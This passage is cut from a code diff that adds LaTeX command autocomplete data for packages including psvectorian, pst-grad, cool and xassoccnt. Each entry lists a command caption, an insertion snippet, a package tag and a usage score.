'psvectorian-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'psvectorian-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'psvectorian-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'psvectorian-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'psvectorian-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'psvectorian-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'psvectorian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'psvectorian-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: 
'\\rotatebox[$1]{$2}{$3}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'psvectorian-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'psvectorian-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\green', + snippet: '\\green', + meta: 'psvectorian-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'psvectorian-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'psvectorian-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'psvectorian-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'psvectorian-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'psvectorian-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'psvectorian-cmd', + score: 0.006520475264573554, + }, + ], + 'pst-grad': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-grad-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-grad-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-grad-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-grad-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-grad-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-grad-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-grad-cmd', + score: 0.006520475264573554, + }, + ], + cool: [ + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'cool-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'cool-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'cool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'cool-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'cool-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'cool-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'cool-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'cool-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: 
'\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'cool-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'cool-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'cool-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'cool-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'cool-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'cool-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'cool-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'cool-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'cool-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'cool-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'cool-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'cool-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'cool-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'cool-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'cool-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'cool-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'cool-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'cool-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'cool-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'cool-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'cool-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'cool-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'cool-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'cool-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'cool-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'cool-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'cool-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'cool-cmd', + score: 0.00011383372700282614, + }, + { + 
caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'cool-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'cool-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'cool-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'cool-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'cool-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'cool-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'cool-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'cool-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'cool-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'cool-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'cool-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'cool-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'cool-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'cool-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'cool-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'cool-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'cool-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'cool-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'cool-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'cool-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'cool-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'cool-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'cool-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'cool-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'cool-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'cool-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'cool-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'cool-cmd', + score: 0.02549889375975901, 
+ }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'cool-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'cool-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'cool-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'cool-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'cool-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'cool-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'cool-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'cool-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'cool-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'cool-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'cool-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'cool-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'cool-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'cool-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'cool-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'cool-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'cool-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'cool-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'cool-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'cool-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'cool-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'cool-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'cool-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'cool-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'cool-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'cool-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'cool-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'cool-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'cool-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'cool-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'cool-cmd', + score: 0.0015513861600956144, + }, + { + 
caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'cool-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'cool-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'cool-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'cool-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'cool-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'cool-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'cool-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'cool-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'cool-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'cool-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'cool-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'cool-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'cool-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'cool-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'cool-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'cool-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'cool-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'cool-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'cool-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'cool-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'cool-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'cool-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'cool-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'cool-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'cool-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'cool-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'cool-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'cool-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'cool-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'cool-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'cool-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'cool-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'cool-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'cool-cmd', + score: 
0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'cool-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'cool-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'cool-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'cool-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'cool-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'cool-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'cool-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'cool-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'cool-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'cool-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'cool-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'cool-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'cool-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'cool-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'cool-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'cool-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'cool-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'cool-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'cool-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'cool-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'cool-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'cool-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'cool-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'cool-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'cool-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'cool-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\forloop{}{}{}{}', + snippet: '\\forloop{$1}{$2}{$3}{$4}', + meta: 'cool-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'cool-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'cool-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'cool-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'cool-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: 
'\\value{$1}', + meta: 'cool-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'cool-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'cool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'cool-cmd', + score: 0.0063276692758974925, + }, + ], + xassoccnt: [ + { + caption: '\\NewTotalDocumentCounter{}', + snippet: '\\NewTotalDocumentCounter{$1}', + meta: 'xassoccnt-cmd', + score: 1.5075186740106946e-5, + }, + { + caption: '\\DeclareAssociatedCounters{}{}', + snippet: '\\DeclareAssociatedCounters{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 1.5075186740106946e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xassoccnt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'xassoccnt-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'xassoccnt-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'xassoccnt-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'xassoccnt-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'xassoccnt-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'xassoccnt-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'xassoccnt-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'xassoccnt-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'xassoccnt-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'xassoccnt-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xassoccnt-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'xassoccnt-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'xassoccnt-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 
'xassoccnt-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xassoccnt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xassoccnt-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xassoccnt-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'xassoccnt-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xassoccnt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xassoccnt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'xassoccnt-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xassoccnt-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'xassoccnt-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: 